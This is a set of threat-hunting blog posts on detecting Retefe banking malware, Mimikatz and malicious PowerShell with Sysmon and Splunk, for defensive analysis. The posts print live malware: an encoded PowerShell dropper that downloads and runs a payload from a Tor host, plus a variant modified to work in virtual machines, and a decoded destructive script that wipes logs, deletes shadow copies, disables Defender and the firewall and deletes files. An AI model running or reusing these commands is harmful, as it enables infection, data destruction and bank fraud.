Friday, February 24, 2017

Hunting Retefe with Splunk - some interesting points

While I was creating some Splunk use cases to detect malware (together with Sysmon) I was doing some test with malware Refete which I wrote quite a bit in this blog about it. 
There are a couple of things I found interested to share

The initial vector of infection is through Malspam with a fake bill in a DOCX file which contains some malicious code. However, this time the malicious code is PowerShell, instead of JS (more info in http://blog.angelalonso.es/2016/10/malicious-email-campaign-against-swiss.html)


This can be spotted straight forward in Splunk.





powershell -EncodedCommand "JABGAD0AJABlAG4AdgA6AFQAZQBtAHAAKwAnAFwAUgBCAFgAcgAxAGwAawA5AFAALgBqAHMAJwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAGwAZQA2AGkAZABmAGQAcQB3AGQAcgA2AG0AMgB3AC4AbwBuAGkAbwBuAC4AdABvAC8AUgBCAFgAcgAxAGwAawA5AFAALgBqAHMAPwBpAHAAPQAnACsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYQBwAGkALgBpAHAAaQBmAHkALgBvAHIAZwAvACcAKQArACcAJgBpAGQAPQAnACsAKAAoAHcAbQBpAGMAIABwAGEAdABoACAAdwBpAG4AMwAyAF8AbABvAGcAaQBjAGEAbABkAGkAcwBrACAAZwBlAHQAIAB2AG8AbAB1AG0AZQBzAGUAcgBpAGEAbABuAHUAbQBiAGUAcgApAFsAMgBdACkALgB0AHIAaQBtACgAKQAuAHQAbwBMAG8AdwBlAHIAKAApACwAJABGACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACQARgApADsA"

The command decoded, which acts as a dropper, is the following:


1
2
$F=$env:Temp+'\RBXr1lk9P.js';
(New-Object System.Net.WebClient).DownloadFile('https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip='+(New-Object System.Net.WebClient).DownloadString('http://api.ipify.org/')+'&id='+((wmic path win32_logicaldisk get volumeserialnumber)[2]).trim().toLower(),$F);(New-Object -com Shell.Application).ShellExecute($F);

Basically, it requests a file located in a Tor node (which is the payload) through the onion.to website: https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip=

To request the file, it is necessary to send the IP of the victim as parameter and the logical number of the disk. To do so, there are 2 things happening:

1) request to http://api.ipify.org/ in order to get the public IP of the victim
2) run the command ((wmic path win32_logicaldisk get volumeserialnumber)[2]) to extract the serial number of the logical disk.
If the IP is not from some specific countries or the serial number is empty the payload downloaded is empty as well, hence nothing happens. Actually, in some cases the parameter "2", doesn't work, and needs to be different.  For, example this command will work in some VirtualMachines (just need to put an IP from Switzerland in the w.x.y.z)


$F=$env:Temp+'\RBXr1lk9P.js';(New-Object System.Net.WebClient).DownloadFile('https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip=w.x.y.z&id='+((wmic path win32_logicaldisk get volumeserialnumber)[4]).trim().toLower(),$F);(New-Object -com Shell.Application).ShellExecute($F)

Clearly, they are using the logical number for tracking purposes

Once the script is pulled the whole execution happens. Some JS code is executed, some additional tools are decompressed and execute (Tor and Proxifier), the browser processes are killed, etc.



However, a couple of new 'features' have been introduced since my last posts:
http://blog.angelalonso.es/2016/10/malicious-email-campaign-against-swiss.html
http://blog.angelalonso.es/2016/10/malicious-email-campaign-mimicking.html

First of all is the way that the Proxifier tool is launched, as the window now is hidden. This is done with the PowerShell command:



"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$t='[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle, int state);';add-type -name w -member $t -namespace n;saps -FilePath \"Proxifier\";while(![n.w]::ShowWindow(([System.Diagnostics.Process]::GetProcessesByName(\"proxifier\")|gps).MainWindowHandle,0)){}"

Second, the Proxifier is configured to not be shown in the windows system Icon on the bottom left part of the desktop.



After that, the victim's traffic towards the banks is redirect to Tor. In order to steal the TAN SMS token, it is necessary to install a malicious APK, however here there are some changes as well:




Now the APK resides in a domain with a valid SSL certificate and the APK can be dowloaded by HTTPS. Before, this was not the case and the traffic was only HTTP

Note that the certificate has been registered a few days ago and the expiration date is 2 months




Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger" tool, hence the victim's phone doesn't get infected. Some examples of the URL for different banks:

https://mobile-sicherheitapp.com/ZKB-Security-v19-02.apk
https://mobile-sicherheitapp.com/CreditSuisse-Security_v1902.apk

https://mobile-sicherheitapp.com/Raiffeisenc-Security-v_19-02.apk





Monday, February 13, 2017

Hunting Mimikatz launched by PowerShell


Following my last post about how to hunt for malicious PowerShell commands, I'm interested to detect Mimikatz once it is launched through PowerShell, like for example with PowerShellEmpire framework. Mark Russinovich has just written that in order to detect Mimikatz you must monitor lsass.exe for process access.



So basically, I have created a simple filter in sysmon for event code 10 (ProcessAccess) with SourceImage PowerShell.exe and TargetImage lsass.exe





<ProcessAccess onmatch="include">
 <SourceImage condition="contains">powershell.exe</SourceImage>
 <TargetImage condition="contains">lsass.exe</TargetImage>
</ProcessAccess>
 
  

Now it is time to test if it works. 
So I use the Mimikatz module in PowerShellEmpire






In Splunk I detect the initial encoded PowerShell Command

 

After a few seconds I run a SPL query to see when the PowerShell.exe command accesses the process lsass.exe, which it is when mimikatz is executed :)







Friday, February 10, 2017

Hunting malicious behaviour abusing PowerShell with Sysmon and Splunk

Sysmon is a monitoring tool which combined with Splunk makes an excellent tandem for threat hunting. A good example was presented by Tom Ueltschi at Botconf 2016.

Windows PowerShell is a command shell very useful for administrative purpose, but at the same time can be abused across different phases of an intrusion and it is being actively used by malware developers. For these reasons, I'm interesting in hunting, using Sysmon and Splunk, when PowerShell is used for bad purposes.  The setup is very simple: Windows Machine(s) with Splunk Forwader and Sysmon. The two necessary files to configured are inputs.conf and config.xml. 
A simple inputs.conf file in the forwarder is the following:

C:\Program Files\SplunkUniversalForwarder\etc\apps\SplunkUniversalForwarder\default\inputs.conf

#   Version 6.4.5
# these here just override and disable stuff that in system/default.

################################
# Data thru parsingQueue always
################################

[splunktcp]
route=has_key:tautology:parsingQueue;absent_key:tautology:parsingQueue

################################
# Make sure these get forwarded
################################

[monitor://$SPLUNK_HOME\var\log\splunk\splunkd.log]
_TCP_ROUTING = *
index = _internal

[monitor://$SPLUNK_HOME\var\log\splunk\metrics.log]
_TCP_ROUTING = *
index = _internal

[WinEventLog://Microsoft-Windows-Sysmon/Operational]
disabled = false
renderXml = true

Regarding the config.xml file for sysmon, it is key to customise the file for each specific environment in order to reduce the noise and catch all the interesting events. In my case,  I have used a very simple one which works for my test environment and doesn't create much noise. A more advance template to use is the one created by @SwiftOnSecurity.

<Sysmon schemaversion="3.2">
  <HashAlgorithms>MD5</HashAlgorithms>
 
  <EventFiltering>
    <!-- Log all drivers except if the signature -->
    <!-- contains Microsoft or Windows -->
    <DriverLoad onmatch="exclude">
      <Signature condition="contains">microsoft</Signature>
      <Signature condition="contains">windows</Signature>
    </DriverLoad>
  <NetworkConnect onmatch="include">
 <DestinationPort>443</DestinationPort>
 <DestinationPort>80</DestinationPort>
  </NetworkConnect>
  
    <!-- Exclude certain processes that cause high event volumes -->
    <ProcessCreate onmatch="exclude">
      <Image condition="contains">splunk</Image>
      <Image condition="contains">streamfwd</Image>
      <Image condition="contains">splunkd</Image>
      <Image condition="contains">splunkD</Image>
      <Image condition="contains">splunk</Image>
      <Image condition="contains">splunk-optimize</Image>
      <Image condition="contains">splunk-MonitorNoHandle</Image>
      <Image condition="contains">splunk-admon</Image>
      <Image condition="contains">splunk-netmon</Image>
      <Image condition="contains">splunk-regmon</Image>
      <Image condition="contains">splunk-winprintmon</Image>
      <Image condition="contains">btool</Image>
      <Image condition="contains">PYTHON</Image>
    </ProcessCreate>
    <ProcessTerminate onmatch="exclude">
      <Image condition="contains">splunk</Image>
      <Image condition="contains">streamfwd</Image>
      <Image condition="contains">splunkd</Image>
      <Image condition="contains">splunkD</Image>
      <Image condition="contains">splunk</Image>
      <Image condition="contains">splunk-optimize</Image>
      <Image condition="contains">splunk-MonitorNoHandle</Image>
      <Image condition="contains">splunk-admon</Image>
      <Image condition="contains">splunk-netmon</Image>
      <Image condition="contains">splunk-regmon</Image>
      <Image condition="contains">splunk-winprintmon</Image>
      <Image condition="contains">btool</Image>
      <Image condition="contains">PYTHON</Image>
    </ProcessTerminate>
    <FileCreateTime onmatch="exclude">
      <Image condition="contains">splunk</Image>
      <Image condition="contains">streamfwd</Image>
      <Image condition="contains">splunkd</Image>
      <Image condition="contains">splunkD</Image>
      <Image condition="contains">splunk</Image>
      <Image condition="contains">splunk-optimize</Image>
      <Image condition="contains">splunk-MonitorNoHandle</Image>
      <Image condition="contains">splunk-admon</Image>
      <Image condition="contains">splunk-netmon</Image>
      <Image condition="contains">splunk-regmon</Image>
      <Image condition="contains">splunk-winprintmon</Image>
      <Image condition="contains">btool</Image>
      <Image condition="contains">PYTHON</Image>
    </FileCreateTime>
  </EventFiltering>
</Sysmon>


As I said, I'm interested in any PowerShell command spawned and the parent process associated. With a simple SPL query I get straight forward all the PowerShell commands executed, as showed below





 Let's analyse each of the executed PowerShell commands from the screenshot above

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c SafetyTest.rar
This command is using the 'ExecutionPolicy bypass' option. According to some documentation the PowerShell Execution Policy was not designed as security control, but as a control to limit mistakes done by sysadmins. https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
In any case, any PowerShell command using that option should be consider suspicious.

It also runs with the option "windowstyle hidden" to hide the prompt. Although this is a not bad indicator 'per se' and some valid scripts can run in the background with this option, this indicator together with any additional other indicator should raise an alert.

In the command above there is another suspicious thing: the 'rar' extension of the file executed by the PowerShell. Looking to any process launched by that Command, as ParentComandLine, I get the following:



So basically, I see that the PowerShell command invokes a cmd.exe to execute the 'rar' file, which means it is not a compress 'rar' file. Following the flow I see that SafetyTest.rar invokes another command: "C:\Users\angel\AppData\Local\Temp\Trojan.exe"


netsh firewall add allowedprogram "C:\Users\angel\AppData\Local\Temp\Trojan.exe" "Trojan.exe" ENABLE

Trojan.exe creates a rule in the firewall to allow itself in the firewall, very very suspicious activity and further investigation should be done in that system.

Continuing with the other PowerShell commands, I see there are several base64 encoded PowerShell commands. I consider any encoded command suspicious and needs to be investigated on account that the embebed encoded command can be anything


powershell -win hidden -enc

dwBoAGkAbABlACgAJAB0AHIAdQBlACkAewANAAoAdwBlAHYAdAB1AHQAaQBsACAAZQBsACAAfAAgAEYAbwByAGUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAdwBlAHYAdAB1AHQAaQBsACAAYwBsACAAIgAkAF8AIgB9AA0ACgBSAEUARwAgAGEAZABkACAAIgBIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAiACAALwB2ACAARABpAHMAYQBiAGwAZQBDAE0ARAAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMgAgAC8AZgANAAoAUgBFAEcAIABBAEQARAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAvAHYAIABFAG4AYQBiAGwAZQBMAFUAQQAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMAAgAC8AZgANAAoAbgBlAHQAIABzAHQAbwBwACAAVgBTAFMAOwAgAFIARQBHACAAYQBkAGQAIAAiAEgASwBMAE0AXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAHMAZQByAHYAaQBjAGUAcwBcAFYAUwBTACIAIAAvAHYAIABTAHQAYQByAHQAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADQAIAAvAGYAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBjADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBkADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBlADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBmADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBnADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQB4ADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQB5ADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQB6ADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQADQAKAG4AZQB0AHMAaAAgAGEAZAB2AGYAaQByAGUAdwBhAGwAbAAgAHMAZQB0ACAAYQBsAGwAcAByAG8AZgBpAGwAZQBzACAAcwB0AGEAdABlACAAbwBmAGYADQAKAHMAYwAgAGMAbwBuAGYAaQBnACAAdwBzAGMAcwB2AGMAIABzAHQAYQByAHQAPQAgAGQAaQBzAGEAYgBsAGUAZAANAAoAUgBFAEcAIABhAGQAZAAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAvAHYAIABEAGkAcwBhAGIAbABlAFQAYQBzAGsATQBnAHIAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADEAIAAvAGYADQAKAG4AZQB0ACAAcwB0AG8AcAAgAFcAaQBuAEQAZQBmAGUAbgBkADsAIABzAGMAIABjAG8AbgBmAGkAZwAgAFcAaQBuAEQAZQBmAGUAbgBkAD0AIABkAGkAcwBhAGIAbABlAGQAOwAgAFIARQBHACAAYQBkAGQAIAAiAEgASwBMAE0AXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAHMAZQByAHYAaQBjAGUAcwBcAFcAaQBuAEQAZQBmAGUAbgBkACIAIAAvAHYAIABTAHQAYQByAHQAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADQAIAAvAGYAOwAgAFIARQBHACAAYQBkAGQAIAAiAEgASwBMAE0AXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIgAgAC8AdgAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAALwB0ACAAUgBFAEcAXwBEAFcATwBSAEQAIAAvAGQAIAAxACAALwBmADsAIABzAGMAIABkAGUAbABlAHQAZQAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBSAEUARwAgAGEAZABkACAAIgBIAEsATABNAFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AIgAgAC8AdgAgAEUAbgBhAGIAbABlAFMAbQBhAHIAdABTAGMAcgBlAGUAbgAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMAAgAC8AZgA7ACAAUgBFAEcAIABhAGQAZAAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEgAbwBzAHQAIgAgAC8AdgAgAEUAbgBhAGIAbABlAFMAbQBhAHIAdABTAGMAcgBlAGUAbgAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMAAgAC8AZgANAAoAbgBlAHQAIABzAHQAbwBwACAAdwB1AGEAdQBzAGUAcgB2AA0ACgBOAGUAdAAgAHUAcwBlAHIAIAAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFACAALwBhAGMAdABpAHYAZQA6AG4AbwANAAoAIwBZAEMAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAbABzAGEAcwBzACAALQBGAG8AcgBjAGUAOwAgAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAHMAbQBzAHMAIAAtAEYAbwByAGMAZQA7ACAAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAYwBvAG4AaABvAHMAdAAgAC0ARgBvAHIAYwBlADsAIABrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABkAHcAbQAgAC0ARgBvAHIAYwBlADsAIABrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABzAHYAYwBoAG8AcwB0ACAALQBGAG8AcgBjAGUAOwAgAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAGUAeABwAGwAbwByAGUAcgAgAC0ARgBvAHIAYwBlAA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABzAHQAZQBhAG0AIAAtAEYAbwByAGMAZQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAHsAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAoAHgAOAA2ACkAfQAgACsAIAAiAFwAUwB0AGUAYQBtACIAKQAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlAA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABzAGsAeQBwAGUAIAAtAEYAbwByAGMAZQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAgACsAIAAiAFwAUwBrAHkAcABlACIAKQAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlAA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIAB0AHMAMwBjAGwAaQBlAG4AdABfAHcAaQBuADYANAAgAC0ARgBvAHIAYwBlADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAoACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACIAXABUAFMAMwBDAGwAaQBlAG4AdAAiACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQANAAoAUgBFAEcAIABhAGQAZAAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAEUAeABwAGwAbwByAGUAcgAiACAALwB2ACAATgBvAEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsACAALwB0ACAAUgBFAEcAXwBEAFcATwBSAEQAIAAvAGQAIAAxACAALwBmAA0ACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAoAFsAZQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AGcAZQB0AGYAbwBsAGQAZQByAHAAYQB0AGgAKAAiAEQAZQBzAGsAdABvAHAAIgApACAAKwAgACIAXAAqAC4AKgAiACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAIgBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAEQAZQBzAGsAdABvAHAAXAAqAC4AKgAiACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUADQAKAFIARQBHACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC8AdgAgAE4AbwBSAHUAbgAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMQAgAC8AZgANAAoAIwBaAEEAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAASQBFAHgAcABsAG8AcgBlACAALQBGAG8AcgBjAGUAOwAgAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAE0AaQBjAHIAbwBzAG8AZgB0AEUAZABnAGUAIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAUwB0AGUAYQBtACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAFMAawB5AHAAZQAgAC0ARgBvAHIAYwBlAA0ACgAjAFoARABrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABDAGgAcgBvAG0AZQAgAC0ARgBvAHIAYwBlAA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABGAGkAcgBlAGYAbwB4ACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAHQAcwAzAGMAbABpAGUAbgB0AF8AdwBpAG4ANgA0ACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAE8AcgBpAGcAaQBuACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAFcAbwByAGQAIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAARQB4AGMAZQBsACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAFAAbwB3AGUAcgBwAG8AaQBuAHQAIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAUABpAGQAZwBpAG4AIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAATwBwAGUAcgBhACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAEMAeQBiAGUAcgBHAGgAbwBzAHQAIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAaQBUAHUAbgBlAHMAIAAtAEYAbwByAGMAZQA7ACAAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAaQBUAHUAbgBlAHMASABlAGwAcABlAHIAIAAtAEYAbwByAGMAZQA7ACAAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAaQBQAG8AZABTAGUAcgB2AGkAYwBlACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAHYAbABjACAALQBGAG8AcgBjAGUADQAKAH0A

The command, when decoded, contains the following set of commands:

while($true){
wevtutil el | Foreach-Object {wevtutil cl "$_"}
REG add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
net stop VSS; REG add "HKLM\SYSTEM\CurrentControlSet\services\VSS" /v Start /t REG_DWORD /d 4 /f; vssadmin delete shadows /for=c: /all /quiet; vssadmin delete shadows /for=d: /all /quiet; vssadmin delete shadows /for=e: /all /quiet; vssadmin delete shadows /for=f: /all /quiet; vssadmin delete shadows /for=g: /all /quiet; vssadmin delete shadows /for=x: /all /quiet; vssadmin delete shadows /for=y: /all /quiet; vssadmin delete shadows /for=z: /all /quiet
netsh advfirewall set allprofiles state off
sc config wscsvc start= disabled
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
net stop WinDefend; sc config WinDefend= disabled; REG add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f; REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f; sc delete windefend
REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f; REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableSmartScreen /t REG_DWORD /d 0 /f
net stop wuauserv
Net user $env:USERNAME /active:no
#YCkill -processname lsass -Force; kill -processname smss -Force; kill -processname conhost -Force; kill -processname dwm -Force; kill -processname svchost -Force; kill -processname explorer -Force
kill -processname steam -Force; Remove-Item (${env:ProgramFiles(x86)} + "\Steam") -Recurse -Force
kill -processname skype -Force; Remove-Item ($env:APPDATA + "\Skype") -Recurse -Force
kill -processname ts3client_win64 -Force; Remove-Item ($env:APPDATA + "\TS3Client") -Recurse -Force
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
Remove-Item ([environment]::getfolderpath("Desktop") + "\*.*") -Recurse -Force; Remove-Item "C:\Users\Public\Desktop\*.*" -Recurse -Force
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
#ZAkill -processname IExplore -Force; kill -processname MicrosoftEdge -Force
kill -processname Steam -Force
kill -processname Skype -Force
#ZDkill -processname Chrome -Force
kill -processname Firefox -Force
kill -processname ts3client_win64 -Force
kill -processname Origin -Force
kill -processname Word -Force
kill -processname Excel -Force
kill -processname Powerpoint -Force
kill -processname Pidgin -Force
kill -processname Opera -Force
kill -processname CyberGhost -Force
kill -processname iTunes -Force; kill -processname iTunesHelper -Force; kill -processname iPodService -Force
kill -processname vlc -Force
Lot of things going on here; modification of registry keys, stopping services, delete shadow copies, disabling firewall, disable the security service center, stopping and disabling AntiVirus (Bit defender), kill several processes, etc. 



